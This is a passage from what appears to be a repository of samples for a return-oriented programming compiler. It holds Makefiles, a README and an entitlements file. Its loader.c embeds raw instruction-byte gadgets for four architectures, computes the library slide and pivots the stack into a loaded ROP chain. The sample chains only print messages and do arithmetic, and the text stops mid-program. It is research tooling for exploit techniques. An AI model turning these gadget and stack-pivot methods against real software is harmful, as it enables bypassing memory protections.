loader-x86 loader-x86_64 6 | 7 | loader-x86: loader.c 8 | gcc -o $@ -m32 $(CFLAGS) -Wl,$(LDFLAGS) $< $(LDLIBS) 9 | 10 | loader-x86_64: loader.c 11 | gcc -o $@ -m64 $(CFLAGS) -Wl,$(LDFLAGS) $< $(LDLIBS) 12 | 13 | clean: 14 | 15 | distclean: clean 16 | -$(RM) loader-x86 loader-x86_64 17 | -------------------------------------------------------------------------------- /sample/Makefile.macos: -------------------------------------------------------------------------------- 1 | CFLAGS = -Wall -W -pedantic -O2 2 | LDFLAGS = -bind_at_load 3 | 4 | all: loader-x86 loader-x86_64 loader-arm loader-arm64 5 | 6 | loader-x86: loader-x86.o 7 | ld -o $@ -demangle -dynamic -arch i386 -macosx_version_min 10.14.0 $(LDFLAGS) $< -lc 8 | 9 | loader-x86.o: loader.c 10 | gcc -o $@ -m32 $(CFLAGS) -c $< 11 | 12 | loader-x86_64: loader.c 13 | gcc -o $@ -m64 $(CFLAGS) -Wl,$(LDFLAGS) $< 14 | 15 | loader-arm: loader.c 16 | clang -arch armv7 -isysroot /usr/local/share/SDKs/iPhoneOS7.0.sdk -o $@ $(CFLAGS) -Wl,$(LDFLAGS) $< 17 | ldid -Sent.xml $@ 18 | 19 | loader-arm64: loader.c 20 | clang -arch arm64 -isysroot /usr/local/share/SDKs/iPhoneOS7.0.sdk -o $@ $(CFLAGS) -Wl,$(LDFLAGS) $< 21 | ldid2 -Sent.xml $@ 22 | 23 | clean: 24 | -$(RM) loader-x86.o 25 | 26 | distclean: clean 27 | -$(RM) loader-x86 loader-x86_64 loader-arm loader-arm64 28 | -------------------------------------------------------------------------------- /sample/README: -------------------------------------------------------------------------------- 1 | 1. Build the rop compilers: 2 | $ Build.sh [x86] [x86_64] [arm] [arm64] [all] 3 | 4 | You should end up with a bunch of rop compilers: 5 | ropc-x86 ropc-x86_64 ropc-arm ropc-arm64 6 | 7 | 8 | 2. Build the loaders: 9 | $ make -f Makefile.macos [loader-x86] [loader-x86_64] [loader-arm] [loader-arm64] 10 | or 11 | $ make -f Makefile.linux [loader-x86] [loader-x86_64] 12 | 13 | You should end up with a bunch of loaders: 14 | loader-x86 loader-x86_64 loader-arm loader-arm64 15 | 16 | NB: all loaders can be PIE or non-PIE, it doesn't really matter 17 | 18 | 19 | 3. Create links for the shared cache, to link the rop strip against: 20 | dyld_shared_cache_i386 -> /var/db/dyld/dyld_shared_cache_i386 21 | dyld_shared_cache_x86_64 -> /var/db/dyld/dyld_shared_cache_x86_64h 22 | dyld_shared_cache_armv7 -> /S/L/C/com.apple.dyld/dyld_shared_cache_armv7s 23 | dyld_shared_cache_arm64 -> /S/L/C/com.apple.dyld/dyld_shared_cache_arm64 24 | or (Linux) 25 | dyld_shared_cache_i386 -> /lib/libc-2.23.so 26 | dyld_shared_cache_x86_64 -> /lib64/libc-2.23.so 27 | ... 28 | or (testing) 29 | dyld_shared_cache_i386 -> loader-x86 30 | dyld_shared_cache_x86_64 -> loader-x86_64 31 | dyld_shared_cache_armv7 -> loader-arm 32 | dyld_shared_cache_arm64 -> loader-arm64 33 | 34 | NB: you can use the respective loader-??? as a "shared cache" since it has 35 | all the needed gadgets, but you'd have to match the rope.c imports with the 36 | loader's exports. Also, in this case, all the loaders should be bind-now, 37 | to avoid dynamic symbol resolution, otherwise each function call may eat up 38 | a *lot* of stack space, likely resulting in a crash. Such chains *must* be 39 | run with -self parameter, because they need the loader (not the lib) slide. 40 | 41 | 42 | 4. Build the rop strips: 43 | $ make [rop-x86] [rop-x86_64] [rop-arm] [rop-arm64] 44 | 45 | You should end up with a bunch of rop strips: 46 | rop-x86 rop-x86_64 rop-arm rop-arm64 47 | 48 | 49 | 5. Run the strips: 50 | ./loader-x86_64 [-self] rop-x86_64 51 | -------------------------------------------------------------------------------- /sample/dyld_shared_cache_arm64: -------------------------------------------------------------------------------- 1 | /System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64 -------------------------------------------------------------------------------- /sample/dyld_shared_cache_armv7: -------------------------------------------------------------------------------- 1 | /System/Library/Caches/com.apple.dyld/dyld_shared_cache_armv7s -------------------------------------------------------------------------------- /sample/dyld_shared_cache_i386: -------------------------------------------------------------------------------- 1 | /var/db/dyld/dyld_shared_cache_i386 -------------------------------------------------------------------------------- /sample/dyld_shared_cache_x86_64: -------------------------------------------------------------------------------- 1 | /var/db/dyld/dyld_shared_cache_x86_64h -------------------------------------------------------------------------------- /sample/ent.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | get-task-allow 8 | 9 | task_for_pid-allow 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /sample/loader.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #ifdef __APPLE__ 13 | #include 14 | #endif 15 | 16 | #define SPACE 0x10000 17 | 18 | #define GADGET(name, insns) \ 19 | extern char name[]; \ 20 | __asm(".p2align 2\n" \ 21 | ".globl _gadget_" #name "\n" \ 22 | "_gadget_" #name ":\n" \ 23 | insns) 24 | 25 | #ifdef __x86_64__ 26 | GADGET(LDR_RAX, 27 | ".byte 0x58, 0xC3\n" 28 | ); 29 | GADGET(LDR_RCX, 30 | ".byte 0x59, 0xC3\n" 31 | ); 32 | GADGET(LDR_RDX, 33 | ".byte 0x5A, 0xC3\n" 34 | ); 35 | GADGET(LDR_RBX, 36 | ".byte 0x5B, 0xC3\n" 37 | ); 38 | GADGET(LDR_RBP, 39 | ".byte 0x5D, 0xC3\n" 40 | ); 41 | GADGET(LDR_RSI, 42 | ".byte 0x5E, 0xC3\n" 43 | ); 44 | GADGET(LDR_RDI, 45 | ".byte 0x5F, 0xC3\n" 46 | ); 47 | GADGET(LDR_R8, 48 | ".byte 0x41, 0x58, 0xC3\n" 49 | ); 50 | GADGET(LDR_R9, 51 | ".byte 0x41, 0x59, 0xC3\n" 52 | ); 53 | GADGET(LDR_RAX_RAX, 54 | ".byte 0x48, 0x8B, 0x00, 0xC3\n" 55 | ); 56 | GADGET(STR_RAX_RBX, 57 | ".byte 0x48, 0x89, 0x03, 0x5B, 0xC3\n" 58 | ".byte 0x48, 0x89, 0x03, 0x48, 0x83, 0xC4, 0x08, 0x5B, 0x5D, 0xC3\n" 59 | ); 60 | GADGET(MOV_RDI_RAX, 61 | ".byte 0x48, 0x89, 0xC7, 0x48, 0x89, 0xF8, 0x5D, 0xC3\n" 62 | ".byte 0x48, 0x89, 0xC7, 0x5B, 0x5D, 0x41, 0x5C, 0xFF, 0xE1\n" // XXX 63 | ".byte 0x48, 0x89, 0xC7, 0x48, 0x8B, 0x49, 0x08, 0xFF, 0xE1\n" 64 | ); 65 | GADGET(MOV_RAX_RDI, 66 | ".byte 0x48, 0x89, 0xF8, 0xC3\n" 67 | ); 68 | GADGET(OR_RAX_reg, 69 | ".byte 0x48, 0x09, 0xD0, 0xC3\n" 70 | ".byte 0x48, 0x09, 0xD0, 0x5D, 0xC3\n" 71 | ); 72 | GADGET(XOR_RAX_reg, 73 | ".byte 0x48, 0x31, 0xD0, 0xC3\n" 74 | ); 75 | GADGET(AND_RAX_reg, 76 | ".byte 0x48, 0x21, 0xF0, 0x5D, 0xC3\n" 77 | ".byte 0x48, 0x21, 0xD0, 0x66, 0x48, 0x0F, 0x6E, 0xC0, 0xC3\n" 78 | ); 79 | GADGET(ADD_RAX_reg, 80 | ".byte 0x48, 0x01, 0xC8, 0xC3\n" 81 | ".byte 0x48, 0x01, 0xD0, 0x5D, 0xC3\n" 82 | ); 83 | GADGET(SUB_RAX_reg, 84 | ".byte 0x48, 0x29, 0xD0, 0xC3\n" 85 | ".byte 0x48, 0x29, 0xC8, 0x5D, 0xC3\n" 86 | ); 87 | GADGET(MUL_RAX_reg, 88 | ".byte 0x48, 0xF7, 0xE6, 0x4C, 0x01, 0xC2, 0xC3\n" 89 | ".byte 0x48, 0xF7, 0xE2, 0x4C, 0x01, 0xC2, 0x48, 0x01, 0xFA, 0xC3\n" 90 | ); 91 | GADGET(DIV_RAX_reg, 92 | ".byte 0x48, 0xF7, 0xF3, 0x5B, 0x5D, 0xC3\n" 93 | ".byte 0x48, 0xF7, 0xF1, 0x48, 0x0F, 0xAF, 0xC7, 0xEB, 0x02, 0x31, 0xC0, 0x5D, 0xC3\n" 94 | ); 95 | GADGET(MUL_RAX_TWO, 96 | ".byte 0x48, 0x8D, 0x44, 0x00, 0xFF, 0xC3\n" 97 | ); 98 | GADGET(BLR_RAX, 99 | ".byte 0xFF, 0xD0, 0x48, 0x83, 0xC4, 0x20, 0x5D, 0xC3\n" 100 | ".byte 0xFF, 0xD0, 0x48, 0x83, 0xC4, 0x38, 0xC3\n" 101 | ); 102 | GADGET(COMMUTE, 103 | ".byte 0x48, 0x89, 0xEC, 0x5D, 0xC3\n" 104 | ".byte 0xC9, 0xC3\n" 105 | ); 106 | GADGET(SELECT, 107 | ".byte 0x48, 0x85, 0xC0, 0x48, 0x89, 0xD0, 0x48, 0x0F, 0x44, 0xC3, 0x5B, 0xC3\n" 108 | ".byte 0x48, 0x85, 0xC0, 0x48, 0x0F, 0x44, 0xCA, 0x48, 0x89, 0xC8, 0x5B, 0x41, 0x5C, 0x41, 0x5E, 0x41, 0x5F, 0x5D, 0xC3\n" 109 | ); 110 | #elif defined(__i386__) 111 | GADGET(LDR_EAX, 112 | ".byte 0x58, 0xC3\n" 113 | ); 114 | GADGET(LDR_ECX, 115 | ".byte 0x59, 0xC3\n" 116 | ); 117 | GADGET(LDR_EDX, 118 | ".byte 0x5A, 0xC3\n" 119 | ".byte 0x5A, 0x5D, 0xC3\n" 120 | ); 121 | GADGET(LDR_EBX, 122 | ".byte 0x5B, 0xC3\n" 123 | ); 124 | GADGET(LDR_EBP, 125 | ".byte 0x5D, 0xC3\n" 126 | ); 127 | GADGET(LDR_ESI, 128 | ".byte 0x5E, 0xC3\n" 129 | ); 130 | GADGET(LDR_EDI, 131 | ".byte 0x5F, 0xC3\n" 132 | ); 133 | GADGET(LDR_EAX_EAX, 134 | ".byte 0x8B, 0x00, 0xC3\n" 135 | ); 136 | GADGET(STR_EAX_ECX, 137 | ".byte 0x89, 0x01, 0xC3\n" 138 | ".byte 0x89, 0x01, 0x5B, 0xC3\n" 139 | ); 140 | GADGET(MOV_EDX_EAX, 141 | ".byte 0x89, 0xC2, 0xC3\n" 142 | ".byte 0x89, 0xC2, 0x5B, 0x89, 0xD0, 0x5E, 0x5F, 0x5D, 0xC3\n" 143 | ); 144 | GADGET(MOV_EAX_EDX, 145 | ".byte 0x89, 0xD0, 0xC3\n" 146 | ); 147 | GADGET(OR_EAX_reg, 148 | ".byte 0x09, 0xC8, 0x5D, 0xC3\n" 149 | ".byte 0x09, 0xC8, 0x5B, 0xC3\n" 150 | ); 151 | GADGET(XOR_EAX_reg, 152 | ".byte 0x31, 0xC8, 0xC3\n" 153 | ); 154 | GADGET(AND_EAX_reg, 155 | ".byte 0x21, 0xC8, 0xC3\n" 156 | ".byte 0x21, 0xC8, 0x5D, 0xC3\n" 157 | ); 158 | GADGET(ADD_EAX_reg, 159 | ".byte 0x01, 0xC8, 0xC3\n" 160 | ); 161 | GADGET(SUB_EAX_reg, 162 | ".byte 0x29, 0xC8, 0xC3\n" 163 | ); 164 | GADGET(MUL_EAX_reg, 165 | ".byte 0xF7, 0xE2, 0x01, 0xCB, 0x01, 0xDA, 0x5B, 0xC3\n" 166 | ); 167 | GADGET(DIV_EAX_reg, 168 | ".byte 0xF7, 0xF1, 0x89, 0xDA, 0x5B, 0xC3\n" 169 | ".byte 0xF7, 0xF6, 0x5B, 0x5E, 0x5F, 0x01, 0xC8, 0xC3\n" 170 | ); 171 | GADGET(MUL_EAX_TWO, 172 | ".byte 0x8D, 0x44, 0x00, 0xFF, 0xC3\n" 173 | ); 174 | GADGET(BLR_EAX_2, 175 | ".byte 0xFF, 0xD0, 0x83, 0xC4, 0x08, 0x5D, 0xC3\n" 176 | ".byte 0xFF, 0xD0, 0x83, 0xC4, 0x0C, 0xC3\n" 177 | ); 178 | GADGET(BLR_EAX_6, 179 | ".byte 0xFF, 0xD0, 0x83, 0xC4, 0x18, 0x5D, 0xC3\n" 180 | ".byte 0xFF, 0xD0, 0x83, 0xC4, 0x1C, 0xC3\n" 181 | ); 182 | GADGET(BLR_EAX_16, 183 | ".byte 0xFF, 0xD0, 0x83, 0xC4, 0x40, 0x5E, 0x5F, 0x5D, 0xC3\n" 184 | ); 185 | GADGET(COMMUTE, 186 | ".byte 0x89, 0xEC, 0x5D, 0xC3\n" 187 | ); 188 | GADGET(SELECT, 189 | ".byte 0x85, 0xC0, 0x0F, 0x45, 0xF1, 0x89, 0xF0, 0x83, 0xC4, 0x0C, 0x5E, 0x5F, 0x5B, 0x5D, 0xC3\n" 190 | ".byte 0x8B, 0x04, 0x90, 0xC3\n" 191 | ); 192 | GADGET(NOT_EAX, 193 | ".byte 0x85, 0xC0, 0x0F, 0x94, 0xC0, 0x0F, 0xB6, 0xC0, 0xC3\n" 194 | ); 195 | #elif defined(__arm64__) 196 | GADGET(LDR_X0, 197 | ".byte 0xE0, 0x03, 0x40, 0xF9, 0x00, 0x01, 0x3F, 0xD6\n" 198 | ); 199 | GADGET(LDR_X1, 200 | ".byte 0xE1, 0x03, 0x40, 0xF9, 0x00, 0x01, 0x3F, 0xD6\n" 201 | ); 202 | GADGET(LDR_X2, 203 | ".byte 0xE2, 0x03, 0x40, 0xF9, 0x00, 0x01, 0x3F, 0xD6\n" 204 | ); 205 | GADGET(LDR_X3, 206 | ".byte 0xE3, 0x03, 0x40, 0xF9, 0x00, 0x01, 0x3F, 0xD6\n" 207 | ); 208 | GADGET(LDR_X19, 209 | ".byte 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 210 | ); 211 | GADGET(LDR_X29, 212 | ".byte 0xFD, 0x7B, 0xC1, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 213 | ); 214 | GADGET(RET_X8, 215 | ".byte 0xE8, 0x07, 0x40, 0xF9, 0x00, 0x01, 0x3F, 0xD6\n" 216 | ); 217 | GADGET(LDR_X0_X0, 218 | ".byte 0x00, 0x00, 0x40, 0xF9, 0x00, 0x01, 0x3F, 0xD6\n" 219 | ); 220 | GADGET(STR_X0_X19, 221 | ".byte 0x60, 0x02, 0x00, 0xF9, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 222 | ); 223 | GADGET(MOV_X1_X0, 224 | ".byte 0xE1, 0x03, 0x00, 0xAA, 0x00, 0x01, 0x3F, 0xD6\n" 225 | ); 226 | GADGET(MOV_X0_X1, 227 | ".byte 0xE0, 0x03, 0x01, 0xAA, 0x00, 0x01, 0x3F, 0xD6\n" 228 | ); 229 | GADGET(OR_X0_reg, 230 | ".byte 0x00, 0x00, 0x13, 0xAA, 0xFD, 0x7B, 0x42, 0xA9, 0xF4, 0x4F, 0x41, 0xA9, 0xFF, 0xC3, 0x00, 0x91, 0xC0, 0x03, 0x5F, 0xD6\n" 231 | ".byte 0x00, 0x00, 0x13, 0xAA, 0xBF, 0x43, 0x00, 0xD1, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 232 | ".byte 0x20, 0x00, 0x00, 0xAA, 0xC0, 0x03, 0x5F, 0xD6\n" 233 | ); 234 | GADGET(XOR_X0_reg, 235 | ".byte 0x00, 0x00, 0x13, 0xCA, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 236 | ); 237 | GADGET(AND_X0_reg, 238 | ".byte 0x20, 0x00, 0x00, 0x8A, 0xFD, 0x7B, 0x42, 0xA9, 0xFF, 0xC3, 0x00, 0x91, 0xC0, 0x03, 0x5F, 0xD6\n" 239 | ".byte 0x00, 0x00, 0x13, 0x8A, 0xBF, 0x43, 0x00, 0xD1, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 240 | ); 241 | GADGET(ADD_X0_reg, 242 | ".byte 0x00, 0x00, 0x01, 0x8B, 0xFD, 0x7B, 0xC1, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 243 | ); 244 | GADGET(SUB_X0_reg, 245 | ".byte 0x00, 0x00, 0x01, 0xCB, 0xFD, 0x7B, 0xC1, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 246 | ".byte 0x00, 0x00, 0x01, 0xCB, 0xFD, 0x7B, 0x41, 0xA9, 0xFF, 0x83, 0x00, 0x91, 0xC0, 0x03, 0x5F, 0xD6\n" 247 | ); 248 | GADGET(MUL_X0_reg, 249 | ".byte 0x00, 0x7C, 0x13, 0x9B, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 250 | ); 251 | GADGET(DIV_X0_reg, 252 | ".byte 0x00, 0x08, 0xD3, 0x9A, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 253 | ".byte 0x00, 0x08, 0xD3, 0x9A, 0x02, 0x00, 0x00, 0x14, 0x00, 0x00, 0x80, 0xD2, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 254 | ".byte 0x00, 0x08, 0xC1, 0x9A, 0xC0, 0x03, 0x5F, 0xD6\n" 255 | ); 256 | GADGET(BR_X3, 257 | ".byte 0xFD, 0x7B, 0xC1, 0xA8, 0x60, 0x00, 0x1F, 0xD6\n" 258 | ); 259 | GADGET(BR_X16, 260 | ".byte 0xF0, 0x03, 0x00, 0xAA, 0xE7, 0x1B, 0xC1, 0xA8, 0xE5, 0x13, 0xC1, 0xA8, 0xE3, 0x0B, 0xC1, 0xA8, 0xE1, 0x03, 0xC1, 0xA8, 0xFD, 0x7B, 0xC1, 0xA8, 0x00, 0x02, 0x1F, 0xD6\n" 261 | ); 262 | GADGET(BLR_X19, 263 | ".byte 0x60, 0x02, 0x3F, 0xD6, 0xFD, 0x7B, 0x42, 0xA9, 0xF4, 0x4F, 0x41, 0xA9, 0xF6, 0x57, 0xC3, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 264 | ); 265 | GADGET(COMMUTE, 266 | ".byte 0xBF, 0x03, 0x00, 0x91, 0xFD, 0x7B, 0xC1, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 267 | ); 268 | GADGET(NOT_X0, 269 | ".byte 0x1F, 0x00, 0x00, 0xF1, 0xE0, 0x17, 0x9F, 0x1A, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 270 | ); 271 | GADGET(SEL_1, 272 | ".byte 0x73, 0x12, 0x9F, 0x9A, 0xE0, 0x03, 0x13, 0xAA, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 273 | ".byte 0x73, 0x12, 0x9F, 0x9A, 0xE0, 0x03, 0x13, 0xAA, 0xFD, 0x7B, 0x42, 0xA9, 0xF4, 0x4F, 0x41, 0xA9, 0xF6, 0x57, 0xC3, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 274 | ".byte 0x73, 0x12, 0x9F, 0x9A, 0xE0, 0x03, 0x13, 0xAA, 0xFD, 0x7B, 0x42, 0xA9, 0xF4, 0x4F, 0x41, 0xA9, 0xFF, 0xC3, 0x00, 0x91, 0xC0, 0x03, 0x5F, 0xD6\n" 275 | ); 276 | GADGET(SEL_2, 277 | ".byte 0x73, 0x02, 0x80, 0x9A, 0xE0, 0x03, 0x13, 0xAA, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 278 | ); 279 | GADGET(PIVOT, 280 | ".byte 0x3F, 0x00, 0x00, 0x91, 0x00, 0x00, 0x1F, 0xD6\n" 281 | ); 282 | #elif defined(__arm__) 283 | GADGET(LDR_R0, 284 | ".byte 0x01, 0xBD\n" 285 | ); 286 | GADGET(LDR_R0R1, 287 | ".byte 0x03, 0xBD\n" 288 | ); 289 | GADGET(LDR_R0TO3, 290 | ".byte 0x0F, 0xBD\n" 291 | ".p2align 2\n" 292 | ".byte 0x0F, 0x80, 0xBD, 0xE8\n" 293 | ); 294 | GADGET(LDR_R4, 295 | ".byte 0x10, 0xBD\n" 296 | ); 297 | GADGET(LDR_R4R5, 298 | ".byte 0x30, 0xBD\n" 299 | ); 300 | GADGET(LDR_R7, 301 | ".byte 0x80, 0xBD\n" 302 | ".byte 0xBD, 0xE8, 0x80, 0x80\n" 303 | ".byte 0x80, 0xBC, 0x5D, 0xF8, 0x04, 0xEB, 0x70, 0x47\n" 304 | ".p2align 2\n" 305 | ".byte 0x80, 0x80, 0xBD, 0xE8\n" 306 | ); 307 | GADGET(LDR_R0_R0, 308 | ".byte 0x00, 0x68, 0x80, 0xBD\n" 309 | ); 310 | GADGET(STR_R0_R4, 311 | ".byte 0x20, 0x60, 0x90, 0xBD\n" 312 | ); 313 | GADGET(MOV_R1_R0, 314 | ".byte 0x01, 0x46, 0x90, 0xBD\n" 315 | ".byte 0x01, 0x46, 0x08, 0x46, 0x80, 0xBD\n" 316 | ".byte 0x01, 0x46, 0x80, 0xBD\n" 317 | ); 318 | GADGET(MOV_R0_R1, 319 | ".byte 0x08, 0x46, 0x80, 0xBD\n" 320 | ".byte 0x08, 0x46, 0x90, 0xBD\n" 321 | ); 322 | GADGET(OR_R0_R1, 323 | ".byte 0x08, 0x43, 0x80, 0xBD\n" 324 | ); 325 | GADGET(XOR_R0_R1, 326 | ".byte 0x48, 0x40, 0x80, 0xBD\n" 327 | ); 328 | GADGET(AND_R0_R1, 329 | ".byte 0x08, 0x40, 0x80, 0xBD\n" 330 | ); 331 | GADGET(ADD_R0_R1, 332 | ".byte 0x08, 0x44, 0x80, 0xBD\n" 333 | ); 334 | GADGET(SUB_R0_R1, 335 | ".byte 0x40, 0x1A, 0x80, 0xBD\n" 336 | ); 337 | GADGET(MUL_R0_R1, 338 | ".byte 0x48, 0x43, 0x80, 0xBD\n" 339 | ); 340 | GADGET(DIV_R0_R1, 341 | ".byte 0xB0, 0xFB, 0xF1, 0xF0, 0x90, 0xBD\n" 342 | ".byte 0xB0, 0xFB, 0xF1, 0xF0, 0xB0, 0xBD\n" 343 | ); 344 | GADGET(BLX_R4, 345 | ".byte 0xA0, 0x47, 0x90, 0xBD\n" 346 | ); 347 | GADGET(BLX_R4_1, 348 | ".byte 0xA0, 0x47, 0x01, 0xB0, 0x90, 0xBD\n" 349 | ); 350 | GADGET(BLX_R4_2, 351 | ".byte 0xA0, 0x47, 0x02, 0xB0, 0x90, 0xBD\n" 352 | ); 353 | GADGET(BLX_R4_3, 354 | ".byte 0xA0, 0x47, 0x03, 0xB0, 0x90, 0xBD\n" 355 | ); 356 | GADGET(BLX_R4_4, 357 | ".byte 0xA0, 0x47, 0x04, 0xB0, 0x90, 0xBD\n" 358 | ); 359 | GADGET(BLX_R4_5, 360 | ".byte 0xA0, 0x47, 0x05, 0xB0, 0x90, 0xBD\n" 361 | ); 362 | GADGET(BLX_R4_6, 363 | ".byte 0xA0, 0x47, 0x06, 0xB0, 0x90, 0xBD\n" 364 | ); 365 | GADGET(COMMUTE, 366 | ".byte 0xBD, 0x46, 0x80, 0xBD\n" 367 | ".byte 0xBD, 0x46, 0xBD, 0xE8, 0x80, 0x80\n" 368 | ".byte 0xBD, 0x46, 0x80, 0xBC, 0x5D, 0xF8, 0x04, 0xEB, 0x70, 0x47\n" 369 | ".p2align 2\n" 370 | ".byte 0x07, 0xD0, 0xA0, 0xE1, 0x80, 0x80, 0xBD, 0xE8\n" 371 | ); 372 | GADGET(SELECT, 373 | ".byte 0x00, 0x28, 0x08, 0xBF, 0x2C, 0x46, 0x20, 0x46, 0xB0, 0xBD\n" 374 | ); 375 | GADGET(LDMIA_R0, 376 | ".byte 0x11, 0xA0, 0x90, 0xE8\n" 377 | ".byte 0x90, 0xE8, 0x11, 0xA0\n" 378 | ); 379 | #endif 380 | 381 | pid_t 382 | getpid_(void) 383 | { 384 | return getpid(); 385 | } 386 | 387 | int 388 | printf_(const char *fmt, ...) 389 | { 390 | int rv; 391 | va_list ap; 392 | va_start(ap, fmt); 393 | rv = vprintf(fmt, ap); 394 | va_end(ap); 395 | return rv; 396 | } 397 | 398 | void 399 | exit_(int status) 400 | { 401 | exit(status); 402 | } 403 | 404 | static void __attribute__((noreturn)) 405 | pivot(char *addr) 406 | { 407 | #ifdef __x86_64__ 408 | __asm __volatile( 409 | "movq %0, %%rsp;" 410 | "popq %%rbp;" 411 | "retq" 412 | ::"X"(addr)); 413 | #elif defined(__i386__) 414 | __asm __volatile( 415 | "movl %0, %%esp;" 416 | "popl %%ebp;" 417 | "ret" 418 | ::"X"(addr)); 419 | #elif defined(__arm64__) 420 | __asm __volatile("\n\ 421 | mov sp, %0\n\ 422 | ldp x29, x30, [sp], 0x10\n\ 423 | ret\n\ 424 | "::"r"(addr)); 425 | #elif defined(__arm__) 426 | __asm __volatile("\n\ 427 | mov sp, %0\n\ 428 | pop {r7, pc}\n\ 429 | "::"r"(addr)); 430 | #endif 431 | __builtin_trap(); 432 | } 433 | 434 | int 435 | main(int argc, char **argv) 436 | { 437 | int rv; 438 | int fd; 439 | char *buf; 440 | ssize_t sz; 441 | struct stat st; 442 | uintptr_t *end, slide = 0; 443 | const char *filename = "rope.bin"; 444 | 445 | if (argc > 1 && !strcmp(argv[1], "-self")) { 446 | #if defined(__linux__) && (defined(__pic__) || defined(__PIC__) || defined(__pie__) || defined(__PIE__)) 447 | Dl_info info; 448 | rv = dladdr((void *)main, &info); 449 | if (rv) { 450 | slide = (uintptr_t)info.dli_fbase; 451 | } 452 | #endif 453 | #ifdef __APPLE__ 454 | slide = _dyld_get_image_vmaddr_slide(0); 455 | #endif 456 | argc--; 457 | argv++; 458 | } else { 459 | #if defined(__linux__) 460 | slide = (uintptr_t)dlsym(RTLD_NEXT, "getpid"); 461 | if (slide) { 462 | for (slide &= ~0xFFF; *(unsigned int *)slide != 0x464C457F; slide -= 0x1000) { 463 | continue; 464 | } 465 | } 466 | #endif 467 | #ifdef __APPLE__ 468 | slide = _dyld_get_image_vmaddr_slide(1); 469 | #endif 470 | } 471 | if (argc > 1) { 472 | filename = argv[1]; 473 | } 474 | 475 | fd = open(filename, O_RDONLY); 476 | if (fd == -1) { 477 | perror("open"); 478 | return -1; 479 | } 480 | 481 | rv = fstat(fd, &st); 482 | if (rv) { 483 | perror("stat"); 484 | close(fd); 485 | return -1; 486 | } 487 | 488 | buf = calloc(1, SPACE + st.st_size); 489 | if (!buf) { 490 | perror("calloc"); 491 | close(fd); 492 | return -1; 493 | } 494 | buf += SPACE; 495 | 496 | sz = read(fd, buf, st.st_size); 497 | if (sz != st.st_size) { 498 | perror("read"); 499 | free(buf); 500 | close(fd); 501 | return -1; 502 | } 503 | 504 | close(fd); 505 | 506 | end = (uintptr_t *)(buf + st.st_size); 507 | while (*--end) { 508 | *(uintptr_t *)(*end + buf) += (uintptr_t)buf; 509 | } 510 | while (*--end) { 511 | *(uintptr_t *)(*end + buf) += slide; 512 | } 513 | 514 | printf("slide = 0x%zx, rope = %p\n", slide, (void *)buf); 515 | pivot(buf); 516 | return 0; 517 | } 518 | -------------------------------------------------------------------------------- /sample/rope.c: -------------------------------------------------------------------------------- 1 | #ifdef ARM64 2 | #define PRINTF_ATTR [[regparm=1]] 3 | #else 4 | #define PRINTF_ATTR 5 | #endif 6 | 7 | /* 8 | * If you want to run these against the loader, make sure the imports match: 9 | * getpid => getpid_ 10 | * ... 11 | */ 12 | extern getpid; 13 | extern printf PRINTF_ATTR; 14 | extern exit [[noreturn]]; 15 | 16 | /* 17 | volatile a = 0x1FF00; 18 | [[stack=0x400]]printf("a = 0x%lx\n", a); 19 | printf("OR : 0x%x\n", a | 0x5A); 20 | printf("AND: 0x%x\n", a & 0x5A00); // x64-linux 21 | printf("XOR: 0x%x\n", a ^ 0x15A00); // x86-linux / x64-linux 22 | printf("ADD: 0x%x\n", a + 3); 23 | printf("SUB: 0x%x\n", a - 1); 24 | printf("MUL: 0x%x\n", a * 16); // x86-linux / x64-linux 25 | printf("DIV: 0x%x\n", a / 16); 26 | 27 | goto skip; 28 | printf("should not be here\n"); 29 | skip: 30 | */ 31 | 32 | i = 5; 33 | loop: 34 | /* give printf a hefty stack reserve (-mrestack may vary) */ 35 | [[stack=0x400]]printf("ohai(%d) %d\n", getpid(), i); 36 | if (i = i - 1) goto loop; 37 | exit(42); 38 | -------------------------------------------------------------------------------- /sample/rope2.c: -------------------------------------------------------------------------------- 1 | #ifdef ARM64 2 | #define PRINTF_ATTR [[regparm=1]] 3 | #else 4 | #define PRINTF_ATTR 5 | #endif 6 | 7 | extern printf PRINTF_ATTR; 8 | extern exit [[noreturn]]; 9 | 10 | a = 5830; 11 | b = 23958233; 12 | ;//[[stack=0x400]]printf("prod = %lu\n", a * b); 13 | 14 | P = 0; 15 | M = 1; 16 | mul: 17 | if !(a & M) goto skip; 18 | P = P + b; 19 | skip: 20 | M = M * 2; 